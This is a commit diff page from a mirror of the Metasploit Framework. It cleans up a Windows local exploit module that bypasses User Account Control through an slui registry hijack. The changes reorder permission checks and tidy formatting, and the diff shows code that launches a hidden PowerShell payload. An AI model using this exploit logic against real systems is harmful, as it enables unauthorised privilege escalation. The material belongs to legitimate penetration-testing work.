infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

code cleanup

GSoC/Meterpreter_Web_Console
bwatters-r7 2018-05-23 12:53:48 -05:00
parent 3ef6f82894
commit 77403479f5
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
1 changed files with 13 additions and 19 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

32
modules/exploits/windows/local/bypassuac_sluihijack.rb
View File

@ -50,8 +50,8 @@ class MetasploitModule < Msf::Exploit::Local
'Platform' => ['win'],
'SessionTypes' => ['meterpreter'],
'Targets' => [
[ 'Windows x86', { 'Arch' => ARCH_X86 } ],
[ 'Windows x64', { 'Arch' => ARCH_X64 } ]
['Windows x86', { 'Arch' => ARCH_X86 }],
['Windows x64', { 'Arch' => ARCH_X64 }]
],
'DefaultTarget' => 0,
'References' => [
@ -74,6 +74,10 @@ class MetasploitModule < Msf::Exploit::Local
end
def exploit
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
commspec = 'powershell'
registry_view = REGISTRY_VIEW_NATIVE
psh_path = "%WINDIR%\\System32\\WindowsPowershell\\v1.0\\powershell.exe"
@ -104,10 +108,6 @@ class MetasploitModule < Msf::Exploit::Local
fail_with(Failure::BadConfig, 'payload and target should use the same architecture')
end
# Validate that we can actually do things before we bother
# doing any more work
check_permissions!
case get_uac_level
when UAC_PROMPT_CREDS_IF_SECURE_DESKTOP,
UAC_PROMPT_CONSENT_IF_SECURE_DESKTOP,
@ -157,11 +157,11 @@ class MetasploitModule < Msf::Exploit::Local
print_status("Executing payload: #{cmd_path} #{cmd_args}")
# We can't use cmd_exec here because it blocks, waiting for a result.
client.sys.process.execute(cmd_path, cmd_args, { 'Hidden' => true })
client.sys.process.execute(cmd_path, cmd_args, 'Hidden' => true)
# Wait a copule of seconds to give the payload a chance to fire before cleaning up
# TODO: fix this up to use something smarter than a timeout?
Rex::sleep(3)
sleep(3)
handler(client)
@ -178,21 +178,15 @@ class MetasploitModule < Msf::Exploit::Local
end
def check_permissions!
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
unless check == Exploit::CheckCode::Appears
fail_with(Failure::NotVulnerable, "Target is not vulnerable.")
end
unless is_in_admin_group?
fail_with(Failure::NoAccess, 'Not in admins group, cannot escalate with this module')
end
fail_with(Failure::None, 'Already in elevated state') if is_admin? || is_system?
# Check if you are an admin
# is_in_admin_group can be nil, true, or false
print_status('UAC is Enabled, checking level...')
vprint_status('Checking admin status...')
admin_group = is_in_admin_group?
if admin_group.nil?
print_error('Either whoami is not there or failed to execute')
print_error('Continuing under assumption you already checked...')